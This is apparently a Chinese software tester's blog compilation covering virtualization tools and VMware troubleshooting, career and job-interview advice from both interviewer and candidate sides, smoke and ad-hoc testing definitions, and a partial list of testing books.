之前做过一部分工作是测试环境的构建和维护，主要是利用虚拟机构建多样的测试环境。目前阿里巴巴主要是linux平台，虚拟机使用的是linux的Xen（准虚拟化技术），vmware未必会用到，但虚拟化技术应用是趋势，在此把对虚拟机了解的一些情况分享出来，大家可以做个了解，希望也可以对广大的测试同行有所帮助。

   一、常见四种虚拟化技术及其对比（请参考高人的文章，原文在http://www.vpshosting.cn/vps/2007/0302/content_264.htm，我是了解和使用，算一名发烧友吧）
   虚拟技术1－硬件分区：硬件资源被划分成数个分区，每个分区享有独立的CPU、内存，并安装独立的操作系统。主要用在大型服务器上。
   虚拟技术2－虚拟机技术：不再对底层的硬件资源进行划分，而是部署一个统一的Host系统。在Host系统上，加装了Virtual Machine Monitor，虚拟层作为应用级别的软件而存在，不涉及操作系统内核。虚拟层会给每个虚拟机模拟一套独立的硬件设备，包含CPU、内存、主板、显卡、网卡等硬件资源，在其上安装所谓的Guest操作系统。最终用户的应用程序，运行在Guest操作系统中。 
   虚拟技术3－准虚拟化技术：为了改善虚拟机技术(Virtual Machine Monitor)的性能，一种新的准虚拟化技术(Para-Virtualizion)技术诞生了。这种虚拟技术以Xen为代表，其特点是修改操作系统的内核，加入一个Xen Hypervisor层。它允许安装在同一硬件设备上的多个系统可以同时启动，由Xen Hypervisor来进行资源调配。
   虚拟技术4－操作系统虚拟化：最新的虚拟化技术已经发展到了操作系统虚拟化，以SWsoft的Virtuozzo/OpenVZ和Sun基于Solaris平台的Container技术为代表，其中Virtuozzo是商业解决方案，而OpenVZ是以Virtuozzo为基础的开源项目。他们的特点是一个单一的节点运行着唯一的操作系统实例。通过在这个系统上加装虚拟化平台，可以将系统划分成多个独立隔离的容器，每个容器是一个虚拟的操作系统，被称为虚拟环境(即VE，Virtual Environment)，也被称为虚拟专用服务器(即VPS，Virtual Private Server)。

   二、虚拟机的好处
   1.资源利用充分，有那么多服务器它们是否充分利用，或者没有那么多物理机器怎么办？利用虚拟机可以充分提高服务器的资源利用率，达到节约成本的目的。
   2.满足开发测试环境多样性的要求，通常不同的数据库和中间件，操作系统，简单组合，就有很多复杂多样的环境。虚拟机可以帮助你去完成这些环境
   3.备份方便：虚拟机的快照技术，让你随时恢复环境，备份可以拷贝虚拟机的几个文件，对非关键应用可以满足需求。
   4.容易部署，管理也方便（管理一个物理主机，其他均可远程管理） 
   5.安全，各个虚拟机之间是没有任何关系的。

   三、主要虚拟机软件的介绍
    Vmware，业界的老大，EMC下的独立子公司。
    GSX Server（推荐）：服务器版，面向小型企业、教育科研机构和开发人员。GSX 作为系统服务运行在windows和linux上。 
    ESX Server:企业服务器版 ，ESX Sever可以直接安装在物理服务器上面，然后在ESX上面安装虚拟机(其实ESX Server本身就在Linux基础上改的)。EXS比GSX性能要高很多，功能方面也高很多，例如在HA方面、虚拟SMP、资源分配、备份方面有很多企业级的特性，但是价格上也要高很多。
    Work Station：工作站版，面向个人用户。小型环境足够使用。
    其他工具如：集中管理工具VMware VirtualCenter、迁移工具VMware P2V Assistant(把应用从物理机器迁移到虚拟机器)、 Vmware Player（ vm workstation的免费版）vmvware  convert（几分钟内可以将物理机转换为虚拟机） vmware infrastructure（VM软件套装）
    Sun Solaris Zone－虚拟操作系统技术，相当于在Solaris上面虚拟出很多Solaris来，每个Solaris分配一定的资源，物理OS和虚拟OS现在只是支持Solaris 10，物理服务器硬件支持X86服务器和Sun的服务器。技术集成在solaris里面，需要做一些配置。
    微软的VPC，Virtual Server－微软是比较有实力的，这个也支持虚拟linux系统。
    其他如swsoft的Virtuozzo采用了和vmware/vpc完全不同的技术（效率高于vmware，Virtuozzo在linux上面有一个开源版本OpenVZ），其他还有一些开源的还有一些开源的虚拟机软件，例如bochs、qemu等等。

linux的Xen，linux的虚拟机，性能较高，这方面的知识需要多向wxc同学多学习和了解！

   四、vmware的软件使用，常见优化方法和常见错误
   使用很简单，建议参考虚拟机的帮助文档。仅介绍一些优化方法
   1）给虚拟机指定固定的最大物理内存
    工具栏选择“编辑”－“参数”－“内存”－可以根据实际的使用情况选择“系统内存分配给虚拟机的方式”
   2）删除不用的虚拟设备
   工具栏选择“虚拟机”－“设置”，选择不会用到的设备删除，比如“音频”，“usb控制器”。
   3）安装VMware工具
    开启虚拟机，工具栏选择“虚拟机”－“安装VMwae工具”
    安装VMwae工具可以增强虚拟机界面显示和鼠标移动效果
   4）虚拟机在创建磁盘时选择一次创建
  （不要使用自己扩充的那种模式，因为在虚拟机自己扩充的过程中可能会有一些监听扫描之类的工作影响效率），即在添加虚拟机硬盘时勾选“马上分配所有磁盘空间”
   5）虚拟机打开显卡加速
    安装了 vmware-tools 后，需要将显卡的硬件加速打开
   6）虚拟机的磁盘整理和磁盘压缩
   整理你的虚拟磁盘会提高，磁盘压缩在安装vmware之后，使用可以压缩你的虚拟机磁盘（限动态分配大小的磁盘）。

   常见错误解决
   a、vmware “经典”错误9297解决方案
   提示错误
   VMware Workstation internal monitor error (bug 9297) *** 
   用记事本打开你的虚拟机虚拟配置文件(.vmx)(or .cfg)，添加下边这行
   paevm = "TRUE"
   这个主要是因为：旧版VMWare不支持在x64处理器上安装物理地址扩展选项
   受影响系统:  Windows XP SP2, Windows Server 2003, Red Hat Enterprise Linux 4, Red Hat    Enterprise Linux 3 Update 3, and Solaris 10.
   b、无法打开虚拟机: XXX.vmx，该虚拟机似乎正在被使用
   解决方法：找到虚拟机系统的文件夹。在此文件夹下，将名字以“.lck ”结尾的文件夹全部重命名，重命名的名字随意改一个。然后再到VMWARE里启动你的VM。或者直接删掉“.lck ”结尾的文件夹，之后可以启动了。
   c、虚拟机快照恢复报错“恢复快照时出错: 文件已存在”
   解决方法：除了在虚拟机文件当前路径下vmware的日志，在操作系统的temp目录下也有vmware的log，按照日志中提示的，删除（先备份）提示已经存在的文件，再还原快照即可。大意就是通过日志找到具体是那个文件提示已存在，然后备份或者删除掉那个文件，再还原快照即可。 

  五、vmware的软件下载
    直接到vmware网站去下载吧。最新的好像是Vmware的6.0版本，相关vmware的认证有VCP（VMware认证专家）。

  六、使用vmware，建议预先创建不同环境的虚拟机模板（预装好各种环境的虚拟机），在使用的时候拷贝虚拟机文件，大概几分钟就搞定一个测试基础环境。还有比如自己做练习和研究，使用虚拟机你就可以随意试验。

  推荐几个网站：
  中文网站：www.vware.cn
           www.xuniji.com
  英文网站：www.vware.com

 

 

  当前，虚拟化技术已经成为服务器市场当之无愧的热点。一方面是可以直接减少服务器的购买数量。另外一方面是可以提高生产效率。目前来看，powderedge系列至少需要4核cpu，8G内存，上百G的大容量硬盘。

  linux阵营XEN是虚拟化技术中比较流行的一种解决方案。

  基于Xen的操作系统，有多个层，最底层和最高特权层是 Xen程序本身。Xen 可以管理多个客户操作系统，每个操作系统都能在一个安全的虚拟机中实现。在Xen的术语中，Domain由Xen控制，以高效的利用CPU的物理资源。每个客户操作系统可以管理它自身的应用。这种管理包括每个程序在规定时间内的响应到执行，是通过Xen调度到虚拟机中实现。
  当Xen启动运行后，第一个虚拟的操作系统，就是Xen本身，我们通过xm list，会发现有一个Domain 0的虚拟机。Domain 0 是其它虚拟主机的管理者和控制者，Domain 0 可以构建其它的更多的Domain ，并管理虚拟设备。它还能执行管理任务，比如虚拟机的体眠、唤醒和迁移其它虚拟机。
一个被称为xend的服务器进程通过domain 0来管理系统，Xend 负责管理众多的虚拟主机，并且提供进入这些系统的控制台。命令经一个命令行的工具通过一个HTTP的接口被传送到xend

自动化测试网站

 

  其实，工作这么久了，但是一直感觉，有个约束套在自己的身上，当自己是个小Test Engineer的时候，想的是如何做Test Lead，当梦想成真了，想的就是Manager了，再之后，在管理岗位上换来换去，其实，对manager的需求，已经不那么在乎，更在乎的是钱了，希望工资越高越好。然后当工资基本还算满意的时候，发现，再想突破自己，越来越难了。

   怎么突破呢，仔细想很久，后来看了写人力资源的文章才略有所悟。他们将职业瓶颈细分了：“一是职位的上升瓶颈，这是我们最常见的理解；二是薪资的上升瓶颈；三是能力和素质的提高瓶颈。”然后发现，其实，这是个瓶颈三角形，你需要完全平衡的突破三角形三个边的长度，才能增大这个三角行的面积。如果仅仅是某一条边或者两条边的突破，就会有风险的存在，很不稳健，换个环境很可能就导致你的下滑。

   因为基本情况下，职位和薪水是基本上由别人由公司或者有整个社会环境调控的，这方面，我们不太好直接的改变，而“能力”这条边，却可以自己主管能动的改变。所以最好的方式是通过提升自己的能力，突破能力瓶颈，再来突破另外两个瓶颈。 具体怎么突破能力瓶颈呢？能力我觉得包括两方面：1、知识本身（理论上的知识） 2、实践而产生的经验和技巧（这个是建立在理论知识之上的，这也是为什么好多公司招聘要求有几年某方面经验的原因）。所以，我们的提升也是从这两方面，首先，自学理论，比如学习Oracle, Linux，比如去考OCA, RHCE认证。比如QTP, LR，自动化测试的能力等等。再之后，再去找能够锻炼这方面能力的机会，本公司没有，就换公司呗。为了未来打基础么。因为已经有了理论基础，很多公司还是会考虑接受的。

其实，说到换工作，这个过程还是有痛苦的，因为，大部分人不勇于舍弃现在已有的，追寻自己想要的。因为舍弃，是痛苦的，因为曾经强烈的拥有着。

回过头来在想一想，其实，我们陷入这个瓶颈之中的人也是可悲的，因为，我们追求的不是幸福本身，而是幸福的外显，是money， 是position， 是capability，是fame，是别人眼中的幸福，而不是自我的enjoy，不是对技术的热爱，不是生命本身带给我们带来的感动。

好久了，写完这篇文章，感觉，内容是属于少部分人的，但是，这部分人对中国测试的未来影响却可能会比较大，因为作为招聘人员，他们在选择测试的未来。尽管看到，国内很多差距，但是，还是希望中国的测试行业，会越来越健康，希望这个讨论，能给招聘同仁们一点点不同的想法

================

因为工作关系，自己有机会很早就接触面试过程，招聘新的测试人员，内部提拔管理人员，并且为了这个事情，如何在候选几个人之间做出抉择的时候也有不少的思想斗争，有些感悟，记录下来。

现在想想，自己面试过的人，肯定要超过100人，面试过程，非常能够体现Interviewer的功力，面对不同的interviewee，问同样的一个问题，会有100个不同的答案，即使是相同的答案，回答的人的语气，表情，细节动作也会不同，这些肢体语言同样会隐含很多问题。怎么能从这些细节之中看到interviewee的区别，这就是功力！更深的功力在于，当别人有了不同的答案之后，你怎么继续问不同的问题，因为对于水平不同的人，你当然要问水平不同的问题，否则，怎么能看出他们的水平？如果面试高水平人员，问的好不好，人家会看出来的，他们会怀疑你们公司到底行不行，你到底懂不懂测试？所以，本身面试过程，一方面是考察候选人，另一方面，也在把自己公司的形象传递给候选人。这个过程很重要。因为对于真正的好人，人家能力强到，他在选公司，而不是公司选他，选公司，意味着起码两个条件：1，公司的待遇和知名度，2，公司里面相处的人，他以后的老板，他是否认同这个人，以有利于他以后的发展。如果他觉得你的水平不一定比他高，这个即使他进来了，你也可能没这个本事管理好。

好，下面言归正传，一步一步开始。
第一，招聘目的。一样的，要搞清楚，你们这次招聘，要招聘什么样的人。是哪个项目组招聘，那个项目组的特别需求在什么地方？比如对数据库功底要求比较高，还是业务要求比较多，或者性能测试之类的。但是这些都是特殊需求。一般，公司都是有特殊需求才开始招聘的，当然也有很多公司，会固定的招聘很多应届生，这个不做讨论。然而在特殊需求之上，我们必须定义一个基本需求，这个是组织层面的。我觉得很多公司可能都没考虑到这一点，但是，这个其实是挺重要的，你需要深入的观察你公司的文化氛围，会发现，公司有这么个文化土壤，特别适合孕育某些人，而，你招聘的时候最好招聘符合你的文化土壤的，否则不太适合成长，当然，除非你对你的文化土壤不满意。

第二，组织层面的基本需求：
1)企业文化需求：首先，组织领导需要对自己的文化有清晰的认识，要招聘什么样的人，这里主要从性格和行为方式上面来看的，比如，很多私企喜欢，踏实，能干活，任劳任怨，没有太多抱怨的人，简而言之他们喜欢“服从者”。很多比较好的外企喜欢，认证听取工作，有问题能主动提出，有自己观点，能够在压力下工作，善于沟通的人，简而言之，就我觉得，他们喜欢“聪明的服从者”。很多国企可能喜欢，比较会看到领导意图，眼睛比较活，说话办事比较圆滑的人。这里你就需要看到自己的组织，到底需要什么类型的人。这里也不是说什么类型的人好，什么样的不好，而是不同的组织文化需要不同性格的人。要是搞进来几个很不合文化的，长久留下来的可能行不大，而且会对管理者产生挑战。
但是，是否说，就一定不要招聘这样的人呢？不一定！有时候，为了组织内部的改革，为了文化的更新，你就是需要几个特别有反叛精神的人，制造一个“鲶鱼效应”！所以说，这个因地制宜。但是，你本身想要建立怎样的文化氛围，精神上的工作环境，这个你自己必须清楚。比如，我就是为了找几个好好干活，老老实实挺话的，遵守规章制度的，那没关系，这种人多得是。你一面试就能看出来这个人是不是很活跃了。太活跃的，有思想的你不要就是了。

2)个人素质需求：上面谈的是个性方面的，更重要的，除了个性之外，还有个素质问题。不同个性的人，可能都有差不多的素质，这个素质，是指：学习能力，沟通能力，思考能力，工作能力。也就是说，有的人不爱说话，有的人很活跃，但是这不妨碍他们的学习能力，可能基础都很好，学习新东西都很快。这些东西，我们要有整体考量。当时我招聘的时候，我就首先观察我现有整个团队的人员素质问题，然后，根据平时的绩效考核，还有自己的观察，找出2，3个素质比较平均的人，以这个人作为标准。招聘的时候，我就回想，如果以这个interviewee和我的这2，3个人做比较，如果，光考虑他们的素质，不考虑经验，我是否会选择他们，如果答案是“yes”，这个基本上我就考虑要这个人了。以为他的到来只会让我们整个团队的素质提高，而不是下降，否则，导致我团队平均素质的下降，我要这个人干嘛？

以上两者，个性+素质，作为基础需求，不过，这是个动态变化、渐进明细的过程，因为，首先你对组织文化的认识，还有方向的认识是逐渐深入的，其次，整体团队的素质应该在你的这个文化的影响下是逐渐提高的，如果不是的话，你需要思考你的团队文化了，需要思考是不是自己不称职？是不是要把自己换掉了哦，呵呵。

第三，是项目或者某次招聘的特别需求，这个，基本上是技术方向上的特别需求。招聘的时候特别把握一下就好了，比如英语要求特别高的，或者需要性能测试的。但是，就我觉得，如果可以，尽量把这个人的这些特别需求建立在刚才所说的基础需求之上，最好这个人是适合前面所说的文化土壤的成长的，如果可以最好这样，不行，再求其次，并且考虑让这个人接受公司的文化。

上面两点之所以如此强调文化，我是想说，无论招聘还是应聘，目光都要放长远，不要那么在乎短期利益，把一个人骗进来了，那只是短时间的，没什么意思。有些公司不错，但是，有些人就是不适合这个公司，不喜欢你们这个所谓的好公司的氛围。比如Huawei,我周边，有不少人都不喜欢这个公司，尽管他待遇相当不错，但是，他就是不喜欢，不喜欢他们对事情的看法，不喜欢做事情的风格，不喜欢拼命的那股劲。尽管很多人很赞美这个床垫文化，但是，他不喜欢，你要是不告诉他，看他能力强，硬是把他来进来了，也没太多意义的，反倒是会破坏你文化的凝聚力。当然我不是说华为不好，总体来说，在全球，华为做出来的成绩是中国企业中非常难得的。
另外其实有很多企业，压根也没啥真正的，值得深掘文化内涵在里面的话，其实作为领导的需要仔细琢磨一下了，一个好的领导带出来的团队，是应该在上面有他自身无法磨灭的痕迹的。

第四，招聘面试过程。
1)面试人数比例.首先仔细挑选一下简历，选择出所需人数150%-200%的人来面试。选择面尽量广一点，很多人很有本事，只是简历写的不好，或者只是不够好好表达，这部分人不能漏掉。给他们个机会，并且让他们能表现出他们的能力。当然怎么能让他们表现出他们的能力，这个就看interviewer了。

2）先观察不急于判断。招聘过程有个东西很重要的，一般，如果2个人，或者3个人一起来做interviewer的话，尽管很多人说，一般前3分钟，就能看出来是否要这个人了，但是，如果你可以，请尽量不要在这3分钟之内做出判断，尽量延长到10分钟，因为，前几分钟一个人的表现，波动很大，往往情绪都没稳定。这时候的判断是有偏颇的。另外，尽量，不要在当场做出判断，而是主要记录这个过程，如果按照七顶颜色的帽子的说法，应该是“白色思维”，客观的思维，然后，面完之后，3个人再合计一下，每个人对这个被面试者的观察，然后根据这个客观观察做自己的推理判断。这个非常重要，可以参见《七顶颜色的帽子》这本书。

3）面试过程的判断：首先基于公司文化需求来判断，在基于公司本次招聘需求来判断，如果前期的需求做得好，现在的判断也跟容易。另外作为一个高素质的interviewer，我时常提醒自己，要荣辱不惊，保持一颗平静的心，O(∩_∩)O哈哈~，不过，我说的也是事实。因为有一次，一个很丑的人过来面试，当时，我们3个人在面试，一见面，吓了一跳，那个男的，真的很丑。星爷电影里面有个叫如花的，不过，不是那个胖如花，而是那个做过什么生发水广告的，那个如花，真是，跟他差不多。虽然我当时感觉，我根本就不想看他，但是，当他回答问题的时候，我还是让他看出，我在看着他，并且期待他的回答。不过，很囧的时，这10分钟时间，另外两个面试官，竟然都是低着头，而且基本不说话……我很囧。尽管最后没有录取他，但是，并不是以他的容貌作为判断的。现在想想，幸好，他技术不是很好，我并没有觉得良心上有啥挣扎，否则，又是个tough  question了。 

强调：如何判断一个有争议的，重要角色的人物？这个Jack Welche做过详细的探讨，不过，我想说的是，这个一定要问自己的那颗心，一定要让自己真诚的说服自己，能够录用这个人，而不是要努力说服别人录取他。而且这个非常消耗面试官的功力。我以前自以为自己看人能力还不错，基本上面试一个重要的人，需要30分钟左右，但是后来换公司之后，看见我们老板面试，差的3分钟，好的20分钟，那个真是快啊。可是，尽管很快，但是把人招聘进来之后，能看到基本都还可以，差距不大。但是，我再后来看到另外一个公司，招聘的水平就很有限了，特别是对经理人员的招聘，几乎只看简历，不看人！很多的经理的管理水平相当的差，不少事情安排不合理，很多员工也都不愿意在他手下工作，当然这个判断也是基于，默认我是一个合格的经理人基础之上判断的。招聘一个错误的经理人，绝对可以抹杀前面你大部分的功绩。在好公司，很大部分员工的离开，都是因为自己的boss。

4）面试官的私心。其实这个也不是难得，关键是，当作为男人的你，遇到美女了，你该怎么办？你会不自觉的多面试一会吧？不自觉的，放低标准吧？能让她进来就尽量让她进来吧？而丑女，你就是能不让她进来就不让她进来了吧？O(∩_∩)O哈哈~，如果，小美女进来了，你孤独已久，漂流已远的心，是不是又再一次焕发生机，是不是在想可以再一次停靠港口了呢？ 所以，其实面试别人的过程，也是面试自己的过程，也是面对自己内心的灵魂的另一面的过程。看看你是否为会用自己的权利来交换那点阴暗的私利的过程，如果交换了一次，你是否，会在以后做出更大交换的过程。 当然从候选者的角度看，你完全可以利用面试官的私心来达到你自己的目的，呵呵...

5）面试过程，如何问问题？如何看出这个人的能力？有些人，面试的时候，表现的很好，能说会道，很配合，表现的很积极，也很合作，但是近来之后，发现似乎不是这样，会不懂装懂。这个，其实，有很多，特别是技术能力，在面试阶段就是可以面出来的，可以发现问题的，而不是等到近来之后才发现不行。怎么面试呢？面试问问题，最好一个问题套一个问题，一个问题深入一个问题，直到问出这个人不明白的，不懂得为止，如果没有不懂，而且回答的很清晰，那说明这个人的确很强。而，同时，如果这个人刚开始的几个问题有欺骗的成分在里面，你几个相关的问题一深入，就会暴露出前面的谎言了。问题，本身的设计，最好是开放的，可以深入的。如果是另外一些非技术问题（有些技术问题也可以），可以问些，比较有争议的，比较能仁者见仁，智者见智的问题，而不是答案非常确定的问题。我们的目的透过这些问题，要看到这个人的思维过程是怎样的，逻辑性是不是很强，在我眼里，思路正确要远大于答案正确。透过这个过程也可以看到这个人的世界观，是善良的，是相对自私的还是比较乐于合作的。所以，看人，主要从有争议的问题中看，而不是听他直白的说。

第五，面试之后，进公司之后的进一步判断。当然，这个本不属于招聘过程了，但是他是这个过程的延续，因为，本来招人，是有个考量的，后续的过程也是这个考量的一部分。你对整个团队需要有个布局，不同的人，根据他们自身的特点，有你作为领导人的布局，当然，这个人是否合适，最好的方法就是，就我自己的感觉，就是放给他们权利。看看，权利是否会毁了这个人，是否会成为权利的奴隶。当然，能够好好利用权利，并认真对待职责的人太少了。好好驾驭他们，给他们犯错误的机会，给他们鼓励，也给他们惩罚。最后这个过程反过来应该对前面招聘的需求，和对人的判断有个反馈，需要你仔细反思为何招聘了这样的一个人进来。又是一个PDCA。这个，很多内容，有机会以后再论述吧。

ok, it is over!

======================

这篇文章，很久以前就写了一半。明天，就是我在这个公司的最后一天了，离职之前的这个上午，伴着5年前买的Shania Twain的up专辑音乐，写完这篇文章，不知道，下次更新会在什么时候。也不知道自己的方向，是否能到达我理想的斯坦，就让这篇文章做一个路标吧。

　　新年第一天到公司，没啥事情，把之前写的一篇文章写完，发布出来，比较长哦，其实还有好多东西没写，人都是比较懒啦，总之希望能给大家一些帮助吧:)

==============

　　已经不准备在这里待下去了，所以动作多了一些，这两个月认识了不少猎头，也面试了不少公司，给自己稍微总结一下，尽管自己面试过的人也有几百个了，自己这段时间被面也有点新的收获，呵呵，希望从interviewer + interviewee两方面讲讲，也能给后来的朋友一些帮助

　　首先，我们要搞清楚自己到底想去怎样的企业，是外企（美国，欧洲，印度），还是内企（民企或者国企），是搞外包的，还是有自己的产品的，是大型的企业（Top 500），还是发展潜力比较好的？一句话，搞清楚自己到底想要什么。是发展前途，还是“钱”！从HR或者interviewer的角度看，明确自己目标的人，比较受欢迎。我面试过程中，遇到好几个HR，在英文面试的时候，都会让我用英语讲一下自己的Career Plan，而英语表达，我觉得最重要的是言之有物，就是观点一定要明确，这样说的时候，别人也容易听懂，自己也容易表达。用英语表达很细腻含糊的概念是很困难的（起码对我来说是这样），而且对方的HR如果是中国人也不一定能听懂，呵呵。所以这边的意思你要有了相当清晰的认识，才容易表达自己，无论英语还是中文。

　　第二，精心修改简历。这个过程，其实是个漫长的过程，每个月，或者每当自己有所新的大的认识提高就可以更新一次简历。其实人需要经常对自己的工作做一些体悟，感悟，最好能将工作和生活中的某些事情能够从本质上统一起来，因为本身世界上道理都是相通的。自己在写简历的时候，要一边修改，一边想，面试者可能会针对你这个简历问什么样的问题，你需要用实际工作中的怎样一个具体的例子来解释这个事情。然后，同时如果有相关的感悟，这时候，在面试的时候，就可以把感悟说出来，这样，会令面试官知道你不是死学，而是活学活用，企业很喜欢这样的人。如果你认识的非常深刻，则会给面试官相当不错的印象的，因为面试官他自己可能都没你认识的深刻，呵呵！所以说，修改简历，不仅仅是改文字，而且是准备好自己的思想和语言。

　　第四，面试！第一关，一般是HR，或者猎头先跟你联系，他们目的是要把握基本的个人信息的完整性和正确性，还有个人素质的感觉。会问一些你的情况，是否真的想要换工作，为什么要换工资，然后你的技能跟他们的岗位是否匹配啊之类的信息。这时候，我个人觉得，两方面，我比较喜欢实话实说，不要说谎，做个诚实的人，心理坦荡，有底气。但是，如果你决定要说谎的话，请不要让对方拆穿你的谎言。其实我以前面试别人的时候，看到过不少人撒谎哦，虽然没拆穿，但是，对这个人印象就不好了。比如，一个家伙他没有任何测试经验，但我感觉他基础还行，准备要他，然后，他说他对测试真的非常感兴趣。我就问他，你既然说你很感兴趣，你看过什么测试方面的书么？他有点支支吾吾，我又问你做过测试方面的什么试验么？他更是支支吾吾。这样搞得就很囧了。

　　对于HR，一般好公司，HR都会问一下你的薪资需求，因为，如果你的要求太高，人家满足不了，也就不用安排后面的面试了。对于自己目前的薪资情况，也没必要撒谎，因为可能到时候要提供自己目前的工资证明的。所以，这时候，对自己要求的薪资应该有个明确的需求，没必要含含糊糊的。不过，我这次就遇到过一个本地的企业，号称是美国的企业，HR水平比较菜，不管三七二十一，就让我过去面试，我都怀疑他们给不起薪水，然后还是决定去了，想练习一下自己么，结果过去一看，压根就是差距很远，只不过是个华人开的，而且管理各方面也都很国企的感觉，面试管的素质也很差。哎，真的浪费时间。

　　第五，面试，第二关，这里说的是一般的情况下的第二关面试，因为我面试过一个top500，他们第二关是英语面试，还有一般的技术了解，然后第三关才是真正的技术面试。我们这里第二关就算是技术面试吧，一般情况下，这个技术面试，是比较简单的，大致的了解，比如linux, DB，之类的都会问到，以确保你知识的全面性。这个只要自己平时有所准备，面试之前稍微总结一下就好了。

　　第六，面试，第三关，一般，这个面试，也是技术面试，更加专业一点的，专门针对他们的技术需求的，比如就是搞自动化的，或者性能测试的。这个有一定难度。这个过程我觉得，最重要的一点就是，保持思路清晰，不要东拉西扯，或者不懂装懂（如果你要装懂，你就要确保别人不会发现你是装懂）。这个专业性的东西，自己之前一定要有自己的一套思路，比如，如果是搞性能的，最好能有自己的一套体系和方法，然后，在这里侃侃而谈，呵呵。如果这个面试也是英文的话，在面试之前，需要好好看看相关概念的英文描述，要不然到时候，可能有些语言不好表达。

　　第七，面试，第四关，如果上面技术面试都没问题了，后面，可能会遇到一个manager，主要跟你谈一下公司的情况，或者以后需要的工作，了解一下，两个人的合作方式啊之类的。呵呵，这个面试，可以说重要，也可以说不重要，如果面的好，你可以，一下子就把你未来的领导搞定。如果面试的不好，搞不好你就没机会了，其中滋味，进公司就知道了哦。

　　总结：上面啰嗦了好多，下面罗列几个面试重点问题和分析：

1	简单的谈一下自己。	观察应试者的语言是否流畅、有条理、层次分明，讲话的风度如何。
2	请你告诉我你的一次失败经历。	如果能迅速作答，则应试者反应灵敏，或可能是应试者善于总结教训。
3	你有什么优点和缺点。	应试者对自己的判断是否中肯，自信、自卑和自傲倾向如何。
4	请讲述一次让你很感动的经历。	考察应试者是否有感性。

　　其实这些问题，一般都是问刚毕业的年轻人的，工作过几年之后，基本上就不会问这么傻乎乎的问题了，呵呵。一般会问些下面的问题：

1	请谈谈你在选择工作时都考虑哪些因素？	同时可判断对方的分析能力和自知力
2	说一下你的工作经历，	了解技术背景，还有能力
3	你为什么离开前面几个公司？	看看是否稳定工作，是否有明确的职业规划

　　最后说一点，无论是否被录用，都不能让所有的面试管都对你不满意，最起码要有几个人能感觉你这个家伙还不错，只是某方面稍微有点缺憾，或者说不适合自己公司，这才能说明，你的面试基本上是成功的，要不然，真的算是失败了。我面试了几个公司，最后因为各种愿意，放弃了，但是，人家HR还是觉得跟我聊的很愉快，甚至会问，如果以后再有其他岗位机会，能否继续再合作（也许有虚假成分，呵呵），不过，很多HR根本可以不跟你说这个话，也许可以说，基本上对你这个人的素质还是认可的。你也容易从中找到自己需要改进的地方。

　　关于面试的东西，太多了，先总结这么多吧。

软件测试的种类何其多也，每种测试都有其要达到的目的和实现手段。本文将介绍两种不太普遍的测试类型-冒烟测试与随机测试。

冒烟测试

冒烟测试（smoke testing）,据说是微软起的名字。在《微软项目求生法则》一书第14章“构建过程”关于冒烟测试，就是开发人员在个人版本的软件上执行目前的冒烟测试项目，确定新的程序代码不出故障。

冒烟测试的名称可以理解为该种测试耗时短，仅用一袋烟功夫足够了。也有人认为是形象地类比新电路板功基本功能检查。任何新电路板焊好后，先通电检查，如果存在设计缺陷，电路板可能会短路，板子冒烟了。

冒烟测试的对象是每一个新编译的需要正式测试的软件版本，目的是确认软件基本功能正常，可以进行后续的正式测试工作。冒烟测试的执行者是版本编译人员。

在一般软件公司，软件在编写过程中，内部需要编译多个版本(Builds)，但是只有有限的几个版本需要执行正式测试（根据项目开发计划），这些需要执行的中间测试版本，在刚刚编译出来后，软件编译人员需要进行基本性能确认测试，例如是否可以正确安装/卸载，主要功能是否实现，是否存在严重死机或数据严重丢失等Bug。如果通过了该测试，则可以根据正式测试文档进行正式测试。否则，就需要重新编译版本，再次执行版本可接收确认测试，直到成功。

新版本的基本功能确认检查的测试，有的公司成为版本健康检查(Build Sanity Check)。对于编译的本地化软件新版本，除了进行上面提到的各种测试检查，还要检查是否在新的本地化版本中正确包含了全部应该本地化的文件。可以通过采用文件和目录结构比较工具，首先比较源语言版本和本地化版本的文件和目录中的文件数目、文件名称和文件日期等，这个过程称为版本镜像检查(Build Image Check)。其次，分别安装源语言版本和本地化版本，比较安装后的文件和目录结构中的文件数目、文件名称和文件日期等，这个过程称为版本安装检查(Build Installing Check)。

随机测试

在软件测试中除了根据测试样例和测试说明书进行测试外，还需要进行随机测试(Ad-hoc testing)，主要是根据测试者的经验对软件进行功能和性能抽查。随机测试是根据测试说明书执行样例测试的重要补充手段，是保证测试覆盖完整性的有效方式和过程。

随机测试主要是对被测软件的一些重要功能进行复测，也包括测试那些当前的测试样例(TestCase)没有覆盖到的部分。另外，对于软件更新和新增加的功能要重点测试。重点对一些特殊点情况点、特殊的使用环境、并发性、进行检查。尤其对以前测试发现的重大Bug，进行再次测试，可以结合回归测试(Regressive testing)一起进行。

理论上，每一个被测软件版本都需要执行随机测试，尤其对于最后的将要发布的版本更要重视随机测试。随机测试最好由具有丰富测试经验的熟悉被测软件的测试人员进行测试。对于被测试的软件越熟悉，执行随机测试越容易。只有不断的积累测试经验，包括具体的测试执行和对缺陷跟踪记录的分析，不断总结，才能提高。

第1. 本帖内的书和简介都是转自网上卖书的书网,故在此向大家说明！
<<软件测试>>
作　者：[美]Paul C.Jorgensen译者：韩柯 杜旭涛
出版社：机械工业出版社 原出版社： CRC
图书简介：
一本同名的经典测试书籍。如果说上面那本的目的是快速的将你引入测试的殿堂，或者说作为一本“快速职业培训”的话，这本则是更深入的介绍了软件测试的基本知识和方法。其中重点介绍了黑盒测试（功能性测试）、白盒测试（结构性测试）的技术和方法，以及如何开展集成测试和系统测试工作。另外，书中还包含了对于面向对象测试的内容。这本书可以作为夯实测试基础的教材，建议阅读。
第2.<<软件测试>> 
作　者：（美）Ron Patton 译者：周予滨 姚静
出版社：机械工业出版社
图书简介：
我所见过的最好最经典的软件测试入门书，有一个别名叫“软件测试的本质”。书中没有讨论太多的软件测试理论，只包含了一部分常用的、基本的知识。从什么是软件测试、为什么要作软件测试开始，逐步引入基本的和高级的测试技术和方法，然后开始把读者引入实际工作中，讲述了一般的测试过程中要经历哪些阶段，要作哪些具体的工作，如何开展测试工作，如何找到缺陷并提交缺陷。甚至还包括了对测试人员的职业指导。建议所有的测试人员都读一读。

第3.<<软件测试自动化>>
作　者：Daniel J.Mosley, Bruce A.Posey/著
出版社：机械工业出版社
图书简介：
